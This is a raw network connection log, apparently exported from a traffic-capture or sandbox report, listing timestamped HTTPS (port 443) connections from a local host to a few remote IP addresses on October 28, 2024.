                                                                            Oct 28, 2024 09:37:09.768250942 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.768263102 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.799474955 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.799523115 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.816303015 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:09.816317081 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:09.817111015 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:09.821410894 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.821460962 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.822582006 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.822601080 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.823169947 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.823182106 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.824114084 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.824121952 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.824719906 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.824737072 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.825587988 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.825598955 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.826176882 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.826210976 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.827270985 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.827284098 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.827569008 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.827580929 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.828392982 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.828398943 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.838921070 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:09.839035034 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:09.839646101 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:09.883383036 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:09.948143005 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.948383093 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.948501110 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.949122906 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.949269056 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.949333906 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.950393915 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.950541019 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.950665951 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.956423044 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.956763983 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.956832886 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.957123041 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.957464933 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.957564116 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.966737986 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.966772079 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.968384027 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.968430996 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.969346046 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.969367981 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.969393015 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.969408035 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.970408916 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.970447063 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.970474958 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.970490932 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.971652985 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.971673012 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.971718073 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.971730947 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.975799084 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.975821972 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.976109028 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.978106022 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.978154898 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.978219986 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.978488922 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.978502035 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.979846954 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.979868889 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.980593920 CET49854443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.980602980 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.980657101 CET49854443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.980793953 CET49854443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.980804920 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.982395887 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.982409954 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.982511044 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.984116077 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.984129906 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.984242916 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.984376907 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.984388113 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.984599113 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:09.984611988 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.191494942 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:10.191664934 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:10.191739082 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:10.193387032 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:10.193428993 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:10.443368912 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:10.443417072 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:10.443567991 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:10.446100950 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:10.446135998 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:10.718142033 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.718607903 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.718663931 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.719054937 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.719060898 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.724740982 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.725163937 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.725173950 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.725574017 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.725579977 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.728415966 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.728773117 CET49854443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.728831053 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.729127884 CET49854443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.729132891 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.748241901 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.748673916 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.748698950 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.749100924 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.749113083 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.750577927 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.750950098 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.750957012 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.751334906 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.751338959 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.956605911 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.956608057 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.956682920 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.956684113 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.956741095 CET49854443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.956779003 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.956826925 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.956911087 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.956995964 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.957165003 CET49854443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.957176924 CET4434985413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.961472988 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.961508036 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.961572886 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.961719036 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.961729050 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.961740017 CET49856443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.961745024 CET4434985613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.962630987 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.962644100 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.963048935 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.963053942 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.963064909 CET49855443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.963069916 CET4434985513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.965049028 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.965070963 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.965238094 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.966541052 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.966577053 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.966756105 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.966967106 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.966989994 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:10.967092037 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:10.967113972 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.087342024 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.087392092 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.087491989 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.089674950 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.089828968 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.094093084 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.134784937 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.134846926 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.134880066 CET49853443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.134896040 CET4434985313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.135840893 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.135840893 CET49852443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.135855913 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.135865927 CET4434985213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.141489029 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.141557932 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.145438910 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.154340982 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.154397011 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.154450893 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.154488087 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.154522896 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.154581070 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.154594898 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.302723885 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:11.303097963 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:11.303158045 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:11.303682089 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:11.304126024 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:11.304217100 CET44349857142.250.186.164192.168.2.4
                                                                            Oct 28, 2024 09:37:11.346369982 CET49857443192.168.2.4142.250.186.164
                                                                            Oct 28, 2024 09:37:11.691438913 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.691970110 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.691989899 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.692565918 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.692569971 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.695888042 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.696264029 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.696336985 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.696808100 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.696815014 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.716989994 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.717375994 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.717406988 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.717883110 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.717894077 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.818568945 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.818706989 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.818936110 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.819000006 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.819000006 CET49859443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.819037914 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.819072008 CET4434985913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.822093010 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.822168112 CET4434986313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.822252989 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.822472095 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.822504044 CET4434986313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.825793028 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.825861931 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.825936079 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.826118946 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.826138020 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.826153040 CET49858443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.826159000 CET4434985813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.828428030 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.828509092 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.828598976 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.828777075 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.828808069 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.851445913 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.851505995 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.851552963 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.851758003 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.851758003 CET49860443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.851783037 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.851795912 CET4434986013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.853979111 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.854063988 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.854157925 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.854300022 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.854336977 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.885752916 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.886188984 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.886208057 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.886814117 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.886823893 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.897924900 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.898433924 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.898471117 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:11.898993015 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:11.899005890 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.018306017 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.018347979 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.018563986 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.018734932 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.018734932 CET49862443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.018759966 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.018771887 CET4434986213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.022784948 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.022842884 CET4434986613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.022948980 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.023106098 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.023133993 CET4434986613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.027834892 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.028034925 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.028099060 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.028243065 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.028254032 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.028281927 CET49861443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.028286934 CET4434986113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.031296015 CET49867443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.031351089 CET4434986713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.031445026 CET49867443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.031811953 CET49867443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.031840086 CET4434986713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.575196981 CET4434986313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.575710058 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.575786114 CET4434986313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.576224089 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.576251984 CET4434986313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.590545893 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.590922117 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.590980053 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.591485977 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.591500044 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.682725906 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.683231115 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.683289051 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.683671951 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.683723927 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.708468914 CET4434986313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.708621979 CET4434986313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.708873034 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.708873034 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.708873034 CET49863443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.711463928 CET49868443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.711503029 CET4434986813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.711565971 CET49868443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.711711884 CET49868443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.711725950 CET4434986813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.758220911 CET4434986613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.758555889 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.758613110 CET4434986613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.758932114 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.758945942 CET4434986613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.771236897 CET4434986713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.771588087 CET49867443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.771661997 CET4434986713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.771908045 CET49867443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.771922112 CET4434986713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.818514109 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.818677902 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.818764925 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.822923899 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.822923899 CET49864443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.822971106 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.823003054 CET4434986413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.825958967 CET49869443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.826025009 CET4434986913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.826119900 CET49869443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.826240063 CET49869443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.826266050 CET4434986913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.885684967 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.886117935 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.886231899 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.886233091 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.886313915 CET49865443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.886349916 CET4434986513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.888257980 CET49870443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.888302088 CET4434987013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.888535976 CET49870443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.888551950 CET4434986613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.888638020 CET49870443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.888649940 CET4434987013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.888771057 CET4434986613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:12.889089108 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.889090061 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.889254093 CET49866443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:12.889292002 CET4434986613.107.246.45192.168.2.4
